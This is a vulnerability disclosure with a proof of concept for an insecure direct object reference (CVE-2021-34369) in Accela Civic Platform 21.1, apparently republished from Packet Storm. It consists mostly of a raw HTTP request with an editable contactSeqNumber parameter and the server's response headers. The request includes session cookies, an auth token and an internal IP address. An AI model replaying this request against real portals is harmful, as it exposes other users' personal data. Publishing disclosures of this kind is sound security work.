Exploit for Accela Civic Platform 21.1 Insecure Direct Object Reference CVE-2021-34369

Name: Exploit for Accela Civic Platform 21.1 Insecure Direct Object Reference CVE-2021-34369
Rating: 5 (166 reviews)
2021-06-14 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:163116
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)  
# Software Link: https://www.accela.com/civic-platform/  
# Version: <= 21.1  
# Author: Abdulazeez Alaseeri  
# Tested on: JBoss server/windows  
# Type: Web App  
# Date: 07/06/2021  
# CVE: CVE-2021-34369  
  
  
================================================================  
Accela Civic Platform Insecure Direct Object References <= 21.1  
================================================================  
  
This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber  
================================================================  
Request Heeaders start  
================================================================  
  
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1  
  
Host: Hidden  
  
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Upgrade-Insecure-Requests: 1  
  
Te: trailers  
  
Connection: close  
  
================================================================  
Request Heeaders end  
================================================================  
  
  
  
================================================================  
Response Heeaders start  
================================================================  
HTTP/1.1 200 OK  
  
Expires: Thu, 01 Jan 1970 00:00:01 GMT  
  
Cache-Control: no-cache  
  
X-Powered-By: JSP/2.3  
  
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure  
  
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure  
  
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure  
  
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure  
  
X-XSS-Protection: 0  
  
Pragma: No-cache  
  
X-UA-Compatible: IE=EDGE  
  
Date: Wed, 09 Jun 2021 04:09:40 GMT  
  
Connection: close  
  
Content-Type: text/html;charset=UTF-8  
  
Content-Length: 98126  
================================================================  
Response Heeaders end  
================================================================  
  
contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR